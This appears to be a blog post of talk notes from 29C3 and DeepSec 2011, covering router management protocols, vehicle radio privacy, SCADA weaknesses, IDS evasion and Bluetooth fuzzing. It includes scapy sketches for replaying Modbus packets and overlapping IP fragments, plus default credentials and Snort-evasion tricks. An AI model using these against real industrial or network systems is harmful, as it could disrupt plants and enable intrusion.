Monday, December 31, 2012

Notes from 29th Chaos Communication Congress - day 1

See also day 2, day 3 and day 4.

Not my department



  • Called the US a totalitarian society / surveillance state

  • "Anonymity will buy you time, but it will not buy anyone justice."



ISP blackboxes


CWMP = CPE WAN Management Protocol (TR-069): used by the ISP to manage "CPEs" (Customer Premises Equipment = home router). Bidirectional SOAP over HTTP; the CPE connects to a configured server URL. The server can read/modify configuration, reboot/reset the device, and flash firmware.

New projects:

  • libfreecwmp / freecwmp: a client, intended for OpenWrt.

  • freeacs-ng: server; uses a separate "provisioning backend" connected through AMQP for the actual data.



Interestingly, configuring the CPE enough to be able to use IP/TCP/HTTP/SOAP and talk CWMP is out of scope of the standard.
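
To make the protocol flow concrete, here is a minimal sketch of the CPE side of a session start, assuming the CPE already knows its server (ACS) URL; the URL, device identity and the abbreviated Inform body are all made up for illustration, and this is not based on the freecwmp code:

    # Minimal sketch of a CWMP (TR-069) session start: the CPE POSTs a SOAP
    # "Inform" to its configured ACS URL; the ACS replies with InformResponse
    # and may then queue further RPCs (GetParameterValues, Reboot, Download...).
    import requests  # assumes the third-party 'requests' package

    ACS_URL = "https://acs.example.net/cwmp"  # hypothetical ACS endpoint

    INFORM = """<?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
      <soapenv:Body>
        <cwmp:Inform>
          <DeviceId>
            <Manufacturer>ExampleVendor</Manufacturer>
            <OUI>001122</OUI>
            <ProductClass>HomeRouter</ProductClass>
            <SerialNumber>SN0001</SerialNumber>
          </DeviceId>
          <Event/>             <!-- abbreviated; a real Inform lists event codes -->
          <MaxEnvelopes>1</MaxEnvelopes>
          <CurrentTime>2012-12-31T00:00:00Z</CurrentTime>
          <RetryCount>0</RetryCount>
          <ParameterList/>     <!-- abbreviated; normally carries device parameters -->
        </cwmp:Inform>
      </soapenv:Body>
    </soapenv:Envelope>"""

    resp = requests.post(ACS_URL, data=INFORM,
                         headers={"Content-Type": "text/xml; charset=utf-8",
                                  "SOAPAction": ""})
    print(resp.status_code)
    print(resp.text)  # InformResponse, possibly followed by further RPCs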

Our daily job: hacking the law


A set of recommendations for lobbying:

  1. You need to have a clear goal.
  2. Be prepared [take a multi-year view, take advantage of opportunities].
  3. Frame your message well.
  4. Know what the legitimate interests of the opponent are.
  5. Stay focused.


Setting mobile phones free


Introduces a new Dutch mobile virtual operator. An interesting feature is the ability to route all incoming calls to the customer's SIP server (=> the customer can direct them to the cell phone as usual, or do something else).

Most of the talk described various aspects of pricing throughout the network operator ecosystem. The only thing new to me was that incoming roaming calls may be more expensive than the EU-regulated maximal end-user price; some virtual operators thus simply don't provide this service.

As for wiretapping: the law requires wiretapping capability, but they were asked to sign an NDA before setting it up. Because the law doesn't mandate any NDA, they refused to sign it; it's unclear how this will develop.

Re-igniting the Crypto Wars on the Web


An overly sensational headline for essentially an invitation to review the proposed W3C JavaScript crypto draft.

Trust assumptions: re: "JavaScript cryptography considered harmful", it is "essentially right given its presuppositions": we still trust the server, CSRF is still a problem, and yes, this proposal doesn't fix that. Still, the proposal provides some otherwise impossible functionality (secure RNGs, constant-time operations, secure key storage...) right now. Also, "it's easy to seize client devices; server-based security ["in the cloud"] is not a terrible thing".



Currently there are ~30 open issues.



API design:



  • Originally started with a high-level idiot-proof API, but gave up on it for
    now as too difficult; so the current proposal is a low-level API
  • Old and broken algorithms are available for compatibility. We could
    exclude the currently broken algorithms, but anything included now will be
    impossible to remove and can still become broken later, so treating the
    currently broken algorithms as a special case is not that useful.
  • Provides asynchronous interface to crypto ops.
  • Haven't decided about key derivation design


Key storage: "as supercookies". Keys could be used for fingerprinting like cookies:


  • So, we want keys to be at least as safe as cookies
  • Also, we want to give the users a "clear keys" operation; therefore this is aimed at more or less ephemeral keys. (Long-term persistent keys are not the primary use case; multi-device key synchronization/management is out of scope.)


Privacy and the car of the future


Describes a "DSRT" (Digital Short-Range Communication) mechanism:


  • "short" = 380m;
  • Vehicle-to-vehicle communication: for safety
  • Vehicle-to-infrastructure communication as well (e.g. no red lights on an empty street)


"It already is happening":


  • Large-scale tests under way to quantify impact of the system on accidents.
  • All auto-makers are involved.
  • HW ready to ship, SW still being developed.
  • US dept. of transportation considering mandating this for new cars, German govt. considering infrastructure deployment


Overview:


  • Basic safety messages sent every 10 seconds; ~50 elements
  • Not a CANbus bridge
  • Radio: 5.9 GHz, 802.11p, fixed-length => "similar to slotted aloha"
  • Not an "automatic system"; only to warn drivers


Authentication: Everything is cryptographically signed, certs issued by a central authority based on a "system fingerprint" (but without a paper trail to the owner); on malfunction, the cert is revoked and the system fingerprint is blacklisted => the radio unit needs to be replaced.

Privacy:


  • MAC layer: all-zero source address for vehicles (to reduce tracking) => protocol is unrouteable; making it routeable would require ID tracking.
  • Basic safety message: contains a "temporary ID" to allow contacting the application; suggested creating an open source implementation to avoid broken implementations (see the rotating-ID sketch after this list).
  • Certificates: identity vs. validity conflicts

    • For privacy, certificates have short validity and are refreshed (X how
      often? We could instead pre-generate certs in advance, but that won't
      update the blacklist; updating the blacklist requires on-line
      connectivity anyway.)
    • Fingerprints hard-coded in the device "strongly discourage hacking"
      because of the cost of replacing, but it's difficult to ensure fingerprints won't
      be disclosed and tracked.
    • How to deliver certificates? Cell phone and wifi infrastructure contain source addresses. (The HW was shipped even though this is still not resolved.)


  • The original proposal included road pricing / toll road integration, abandoned
    as incompatible with privacy.
  • Is it all worth the effort, when one can already identify the person using a cell phone?
  • "Worrisome noise" related to this:

    • Geo-targeted advertising and similar "funding" schemes.
    • "Data brokers" might be interested in running the fixed infrastructure
      to access data.
    • Law enforcement: speed is broadcast; correlating this with camera
      identification would be fairly easy (X that would hinder adoption)
      (the cameras can already identify a car, but to precisely measure speed
      the radar needs to be "calibrated" (?))
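
To illustrate the temporary-ID idea from the privacy list above, here is a toy sketch of a sender that stamps BSM-like records with a periodically rotated random ID instead of a fixed vehicle identifier. The field set, class names and the rotation interval are all invented; the real message set and the short-validity certificates that sign it are far richer:

    # Toy model of a rotating "temporary ID" for basic safety messages.
    # Everything here (fields, rotation interval) is an illustrative assumption.
    import secrets
    import time
    from dataclasses import dataclass

    @dataclass
    class BasicSafetyMessage:
        temp_id: bytes      # short random ID, not tied to the vehicle or owner
        timestamp: float    # GPS-derived time in the real system
        latitude: float
        longitude: float
        speed_mps: float
        heading_deg: float

    class BsmSender:
        ROTATE_AFTER = 300.0  # assumed rotation period in seconds

        def __init__(self):
            self._rotate()

        def _rotate(self):
            self.temp_id = secrets.token_bytes(4)
            self.rotated_at = time.time()

        def make_bsm(self, lat, lon, speed, heading):
            # A fresh random ID every few minutes breaks long-term tracking by
            # passive listeners while still letting nearby applications refer
            # to "the same car" over a short interval.
            if time.time() - self.rotated_at > self.ROTATE_AFTER:
                self._rotate()
            return BasicSafetyMessage(self.temp_id, time.time(),
                                      lat, lon, speed, heading)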



What can be done now:


  • Hack the radios (commercially available)
  • Hack the protocols (802.11p public)
  • Politically engage (US: the National Highway Traffic Safety Administration; EU: ETSI); decisions are mostly made by unelected standards bodies. Help them find funding without "selling out".


Insurance impact:


  • "Regulation will probably only allow rate reductions" based on this.
  • Insurers will want the data, but probably don't have the political power.
  • Car black boxes are already mandated in the US


Infrastructure-to-vehicle: discussed in Europe for traffic management ("accident ahead" etc.); abandoned in the US because of funding issues (little money for roads expected).

Security:


  • Nothing stops one from relaying a message to a different location
    (but the message contains location, so it isn't an attack); and this will be wanted for various statistics
  • Similarly, can replay an old message (but each message contains a GPS-originated time stamp)
  • "You can send all sort of funny stuff", e.g. fake sensor input
    "I don't like to talk too much about it, covered by NDA".
  • "Auto manufactures recognize CANbus is so insecure that they don't trust it" => DSRC would use a separate, independent control unit.

    • "I might believe they are ready to abandon CANbus".
    • "The real problem with CANbus are the weird extensions", like USA-mandated tire pressure sensors



SCADA strangelove


Europe is the region with the most internet-exposed SCADA vulnerabilities; Italy is the most vulnerable country (not sure why - perhaps a highly industrialized country with wide deployment of smart grids).

Industrial users think SCADA systems are isolated networks running on special => "safe" platforms, but:

  • 100% of tested networks are (typically indirectly) exposed to the internet.
  • 99% can be hacked with Metasploit (some reboot on a TCP connect scan)
  • 50% of "HMI" engineering stations are also used as desktops
  • Standard network protocols, OSes, DBMSs and apps are used
    (typically Windows/SQL for SCADA, Linux/QNX for PLCs)
    ... but with no security; ICS experts don't view it as a computer system



ICS transports: Ethernet, GSM/GPRS, RS-232/485, Wifi, ZigBee, others.

Protocols:


  • Sniffing: Wireshark supports most of it, plus some 3rd-party protocol dissectors. There are also industry-grade tools ("FTE NetDecoder").
  • Spoofing/injection: tools are available for Modbus; otherwise generic tools (scapy) are needed - but for most protocols you can just replay packets (see the sketch after this list).
  • Fingerprinting: Well-known ports used
  • Fuzzing: most devices will crash within a minute
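
As a sketch of the "just replay packets" point above (the capture filter, Modbus/TCP port and PLC address are assumptions; lab equipment only):

    # Capture one Modbus/TCP request and replay its application payload over a
    # fresh connection.  Most ICS protocols have no authentication, session
    # binding or freshness checks, so a verbatim replay is usually accepted.
    import socket
    from scapy.all import sniff, TCP, Raw  # requires scapy and capture privileges

    PLC = "192.0.2.10"  # hypothetical lab PLC

    pkts = sniff(filter="tcp dst port 502 and host %s" % PLC, count=10)
    requests = [bytes(p[Raw]) for p in pkts
                if p.haslayer(Raw) and p[TCP].dport == 502]

    with socket.create_connection((PLC, 502), timeout=3) as s:
        s.sendall(requests[0])        # resend the captured request verbatim
        print(s.recv(1024).hex())     # the PLC answers as if it were the original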


PLC: "just a network device"


  • Finding vulnerabilities: Getting a PLC for a lab is difficult, but getting a firmware from the internet is easy.
  • Siemens S7 PLC: found a hard-coded private "certification authority", apparently including the private key.


SCADA = a network application connecting to PLCs, running on top of an OS/DBMS


  • => It's not necessary to hack the SCADA application itself; one can attack the OS/DBMS. These typically have a restricted OS configuration (kiosk mode etc.), but there are bypasses [e.g. PLC firmware updates have to be signed by a key on a HW token, but the PLC has a root/toor ssh account that bypasses this].
  • WinCC: uses a database to store most information.

    • Had hard-coded passwords: noticed in 2005, abused by Stuxnet in 2010, fixed in 2010, but they still work almost everywhere. [The username/password was published on a Siemens forum :))]
    • MS SQL listening on the network (=> all security needs to reside in the DB, difficult to rework this design)
    • Inside the database, passwords are XORed with a fixed ASCII string (a toy illustration follows this list)

  • DiagAgent:

    • Not started by default, Siemens recommends not using it
    • No auth at all
    • XSS, path traversal, buffer overflows.

  • WebNavigator:

    • HMI tool as a web application
    • XPath injection, path traversals, ~20 instances of XSS... fixed now
    • XSS in HMI => can use operator's browser as a proxy to SCADA network
    • Looking at plugin lists, a lot of companies/industries access the network using IE with HMI plugins... (they were asked "how do I install Firefox on Windows 3? this IE won't run Facebook"). How to mitigate? "A guy with a gun standing behind the user is also a way to do risk management".
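
A toy illustration of the XOR obfuscation mentioned in the WinCC item above (the key below is made up, not the real WinCC string); the point is that anyone with database access and the fixed key recovers every password trivially:

    # XOR with a fixed ASCII string is not encryption: applying the same key
    # twice returns the plaintext, and the key ships with every installation.
    def xor_with_key(data: bytes, key: bytes) -> bytes:
        return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

    KEY = b"FixedAsciiKey"                        # hypothetical key
    stored = xor_with_key(b"operator123", KEY)    # what ends up in the database
    print(stored.hex())
    print(xor_with_key(stored, KEY))              # XOR again -> b'operator123'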



The authors released some SCADA tools:


  • ??? "dorks"?
  • Device scan/fingerprint tools for Modbus and S7 (a minimal Modbus fingerprinting sketch follows this list)
  • metasploit module for WinCC
  • "SCADA Security Hardening Guide" published


Summary: There's lots of low-hanging fruit, it's scary.

Highlighted great experience with Siemens' security team: good cooperation, quick replies, even provided patches.

A lot of companies have no patch management ("It's working, don't touch it")
=> vendors need to push customers ("Guys, you need to update to make it work").
Also, companies can't change things because it would break certification.

The worst thing they found: Windows 95, Windows 3.1
(typical situation: bought the system ages ago, got "spare parts" (=replacement
computers) in stock if they fail, have no idea how these things work or
what's in there)

A commenter noted that supposedly nuclear plants now use wifi instead of
Ethernet because Ethernet means validating "every meter" of the cable, whereas wifi works everywhere.

Notes from DeepSec 2011 day 1

(The DeepSec 2011 notes were apparently never finished, and I have just found this draft. Perhaps this might still be useful.)

Here are some notes from the first day of DeepSec 2011.

How Terrorists Encrypt


Historically, terrorism was used as a justification for restricting cryptography. This includes the original proposal for Clipper, and supposedly Al-Qaeda using steganography in "X-rated pictures" (tracked down to an unknown security company demonstrating steganography in Mona Lisa).

Actually, the 9/11 hijackers did not use encryption at all - just simple e-mails back and forth, with simple code word substitution.

Similarly, various Al-Qaeda manuals, if they deal with encryption at all, only describe simple monoalphabetic substitutions and using code names. A single operation used PGP competently, but only for local storage, not communication with other groups.

In practice, use of code names and "web mail dead drops" (sharing a webmail account name+password, and storing messages in the draft folder, to defeat traffic analysis) is frequent. A single "Islamic program for secure network communication" appeared on forums, with unknown provenance (an espionage "plant" suspected) - probably only a GUI for gpg.

The presentation continued with a large list of (UK-focused) counter-terrorism operations, the vast majority of which used no cryptography at all. Where encryption was used for communication, it was trivial substitution. There was one case of PGP use and one case of TrueCrypt use - both within a small group of competent people, and not used for communication.

There were some interesting notes about police handling of crypto - in one case a computer (and the forensic image?) was destroyed as a "biohazard"; in another case the UK government was able to find a PGP passphrase through an unknown method (the passphrase was not exactly, but "structurally similar to", "Bowl of SSSmile").

In summary:

  • Encryption is not used by terrorists for communication

  • They are concerned about traffic analysis

  • Some use encryption of personal data storage

  • Lessons from "Why Johnny Can't Encrypt" still apply: people are lazy, do it incorrectly, and don't know how to tell good crypto from bad.



Reassemble or GTFO! - IDS Evasion Strategies


A general summary of issues with IDS systems.

Inherent issues:

  • Ambiguous RFCs

  • Inconsistencies in how implementations react to input - an IDS needs to behave like all implementations at the same time

  • Lack of resources/processing capacity

  • Lack of data to analyze

  • Complex protocols that cannot be understood from a single packet, e.g. MS RPC on port 135



Vendor behavior:

  • Vendors talk about throughput, not about detection: A typical IDS has a 5-10% detection rate when shipped. It can be tuned to 98% detection rate, but then it becomes really slow.

  • Most vendors import snort rules (they are available for free, so why write our own?)

  • Most vendors only inspect first ~300 bytes, to increase throughput

  • IDSes tend to fail open - they are often set up as passive listeners, and nobody wants to bring the network down



Evasion methods:

  • Snort has a rule for detecting shellcode: "AAAAAAAAAA" and "CCCCCCC" (each with a different, carefully tuned length to balance detection with false positives)

    • Just use a different fill character to avoid detection

    • Append AAAAAAAAAAAA to the end of any request, the rule will be quickly turned off due to too many alarms

    • Or put AAAAAAA into an email signature...

    • "This is the level of sophistication we are dealing with."


  • For HTTP, use gzip compression and chunked transfer-encoding; the resulting packets don't have enough context to be decoded.

  • Cause the IDS and the final endpoint to receive different data:

    • Use an invalid IP checksum - IDS won't check it, and will accept the packet (but it's difficult to get such a packet past any internet router).

    • If the endpoint's MTU is larger than the IDS's MTU, set the DF flag.

    • Desynchronize TCP sequence number state: if the IDS uses a 3-way handshake, simulate it; if the IDS resynchronizes with any traffic, just send fake traffic.

    • Reassembly attacks, e.g. when fragments overlap: Windows always keeps the old data, Unix always keeps the new data (a scapy sketch of this follows the list).
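
A minimal scapy sketch of the overlapping-fragment ambiguity (needs root to send raw packets; the target address is a made-up lab host, and this only illustrates the ambiguity rather than a complete working evasion):

    # Two fragments claim the same offset with different bytes.  A stack that
    # keeps the data seen first ("Windows-style") reassembles a different byte
    # stream than one that keeps the data seen last ("Unix-style"), and the IDS
    # cannot know which of the two the endpoint actually used.
    from scapy.all import IP, TCP, Raw, fragment, send

    TARGET = "192.0.2.20"  # hypothetical lab host

    pkt = (IP(dst=TARGET)
           / TCP(dport=80, sport=40000, flags="PA", seq=1000)
           / Raw(b"GET /index.html HTTP/1.0\r\n\r\n"))
    frags = fragment(pkt, fragsize=8)      # split the IP payload into 8-byte pieces

    # A forged fragment covering the same offset as frags[4], with other bytes.
    overlap = (IP(dst=TARGET, id=pkt[IP].id, proto=6, flags="MF", frag=4)
               / Raw(b"XXXXXXXX"))

    for f in frags[:4]:
        send(f)
    send(overlap)          # arrives before the "real" data for that offset
    for f in frags[4:]:
        send(f)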



Intelligent Bluetooth fuzzing - Why bother?


Presented results from various Bluetooth fuzzing attempts, on L2CAP and the layers above it (= what is implemented in software). In carkit testing, 13 of 15 carkits were problematic, some requiring dealer service; 10 crashed even without pairing.

Typical "anomalies":

  • Length field over/underflows, especially in type-length-value structures, e.g. simply using length 0 or 0xFFFF (see the TLV sketch after this list)

  • In type-length-value structures, inconsistent length and NUL-termination (when both are required)

  • Data structure fuzzing, e.g. buffer overflows

  • Repeating valid data many times (overflows, resource exhaustion)

  • Flooding with a lot of valid data (no need to fuzz): especially for low-resource devices, e.g. headsets

  • Some multi-field anomalies (when more than one field is fuzzed at once)

  • Sending valid messages in incorrect sequence



Implementation notes:

  • Many profiles use AT commands or OBEX, but different profiles often have separate parsers, so the same input in different profiles has different results.

  • Typical defense focuses on preventing unauthorized access, not robustness.

  • "Anomalies" sometimes propagate to underlying systems (e.g. authentication servers on the network)

  • Some headsets die after an anomalous packet and never recover.

  • A lot of code sharing: the same vendor stack is used in various devices.



Some bluetooth security measures:

  • Pairing

    • Legacy mode is only a 4-digit code. Known values: 0000, 1234.

    • Can almost always connect via L2CAP to "PSM 1" (SDP) without pairing (this is what makes scanning possible; see the socket sketch after this list).

    • The newer "simple secure pairing" mechanism can be downgraded to legacy mode

    • SSP "justworks" method does not require authentication; supposed to only allow host->client connections, but sometimes works the other way as well

    • Some devices stop requesting pairing after receiving anomalies


  • Non-discoverable mode: the device may still accept connections.
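
As a small illustration of the PSM 1 point above, a sketch using Python's Linux-only Bluetooth socket support; the device address is made up, and whether the connection succeeds without pairing depends on the device:

    # Try an L2CAP connection to PSM 1 (SDP), which is typically reachable even
    # from unpaired hosts and even when the device is non-discoverable.
    # Linux only; requires a local Bluetooth adapter.
    import socket

    ADDR = "00:11:22:33:44:55"   # hypothetical device address
    PSM_SDP = 1

    s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET,
                      socket.BTPROTO_L2CAP)
    s.settimeout(5)
    try:
        s.connect((ADDR, PSM_SDP))
        print("L2CAP connection to PSM 1 accepted without pairing")
    finally:
        s.close()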



Why this works: "You are not supposed to do that" (and detecting a specific form of attack instead of fixing the cause), "It's not in the spec", "Why should anyone care if the cheap device breaks?" (but Bluetooth is becoming more critical - it is used in medical devices, e.g. insulin pumps), and writing reliable code is difficult.